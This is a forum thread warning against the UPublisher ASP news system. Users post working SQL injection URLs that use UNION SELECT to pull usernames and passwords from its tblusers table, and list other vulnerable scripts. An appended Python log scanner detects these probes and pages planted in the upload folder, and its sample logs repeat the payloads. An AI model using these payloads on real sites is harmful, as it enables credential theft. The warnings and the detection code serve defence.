UPublisher | ASP News Publishing System for UD
Hey Jarke,
One of the problems with having a live demo is that people often feel inclined to try and break it and/or fill it with juvenile comments.
It should be all fixed now.
Shannon
team macromedia ultradev
Please avoid using their UPublisher product ... and likely ALL superfreaker (a.k.a. superf**ked) products.
Do a Google search on "UPublisher exploit" to see the reason why.
http://www.milw0rm.com/exploits/2765
http://[target]/[path]//viewarticle.asp?ID=[SQL]
Example:
\viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers
--- OR ---
\viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers
LOL - even Superfreaker's DEMO page was hacked:
If your copy of UPublisher has been hacked, be CERTAIN to review / clean the uploads folder at: /images/story_images/
In our case, the hacker was able to upload entire HTML pages ... and then reference them from their browser since they now knew the full URL to their HTML form!
Damn you, StupidFreaker
In regard to the many articles on Google:
http://www.google.com/search?hl=en&q=upublisher+exploit
Superfreaker's "UPublisher" exploit is NOT LIMITED to their "viewarticle.asp" script.
In fact, most of the product is vulnerable to SQL Injection attacks. Some other pages are "index.asp" and "preferences.asp".
Some other UPublisher scripts that CAN be hacked using the SAME METHOD you described above:
sendarticle.asp
printarticle.asp
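As an added example, not code from UPublisher or from any post in this thread: a small Python log scanner that flags the two abuse patterns the thread describes (non-numeric or UNION-based values in the ID parameter of the scripts named above, and HTML or ASP files being served out of the /images/story_images/ upload folder). The script names and folder come from the thread; the IIS W3C field order (date time method uri-stem uri-query status) is an assumption and the log lines are constructed.

```python
import re
from urllib.parse import parse_qs
# Added example, not UPublisher code. Assumed W3C field order per line:
# date time cs-method cs-uri-stem cs-uri-query sc-status
ID_SCRIPTS = {"/viewarticle.asp", "/printarticle.asp", "/sendarticle.asp",
              "/index.asp", "/preferences.asp"}   # scripts named in the thread
UPLOAD_DIR = "/images/story_images/"               # upload folder named in the thread
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)
ACTIVE_EXT_RE = re.compile(r"\.(html?|aspx?)$", re.IGNORECASE)
# Constructed sample traffic (not real logs); the injected queries mirror the thread.
SAMPLE_LOG = """\
2006-11-10 12:00:01 GET /viewarticle.asp ID=17 200
2006-11-10 12:00:05 GET /viewarticle.asp ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers 200
2006-11-10 12:00:09 GET /printarticle.asp ID=-1+UNION+SELECT+0,0,username,password,0,0,0,0,0+FROM+tblusers 500
2006-11-10 12:00:12 GET /images/story_images/login.html - 200
2006-11-10 12:00:15 GET /images/story_images/photo.jpg - 200
"""

def parse_line(line):
    """Split one W3C line into a record; return None for malformed lines."""
    parts = line.split()
    if len(parts) != 6:
        return None
    date, time, _method, stem, query, status = parts
    return {"when": f"{date} {time}", "stem": stem.lower(),
            "query": "" if query == "-" else query, "status": int(status)}

def classify(rec):
    """Return finding labels for one record (empty when nothing looks wrong)."""
    labels = []
    if rec["stem"] in ID_SCRIPTS:
        # parse_qs decodes both %20 and '+', so both encodings seen in the thread are covered.
        params = {k.lower(): v for k, v in parse_qs(rec["query"], keep_blank_values=True).items()}
        for value in params.get("id", []):
            if UNION_RE.search(value):
                labels.append("union-based SQL injection in ID")
            elif not re.fullmatch(r"-?\d+", value):
                labels.append("non-numeric ID")
    # HTML or ASP fetched from the image upload folder points at a planted page.
    if rec["stem"].startswith(UPLOAD_DIR) and ACTIVE_EXT_RE.search(rec["stem"]):
        labels.append("active content served from upload folder")
    return labels

def scan_log(text):
    """Return (when, stem, label) for every suspicious line in the log text."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec:
            hits.extend((rec["when"], rec["stem"], lbl) for lbl in classify(rec))
    return hits
```

Run against real IIS logs by feeding the file contents to scan_log; the numeric-ID check catches probes that do not use UNION at all, which is why it is kept separate from the UNION rule.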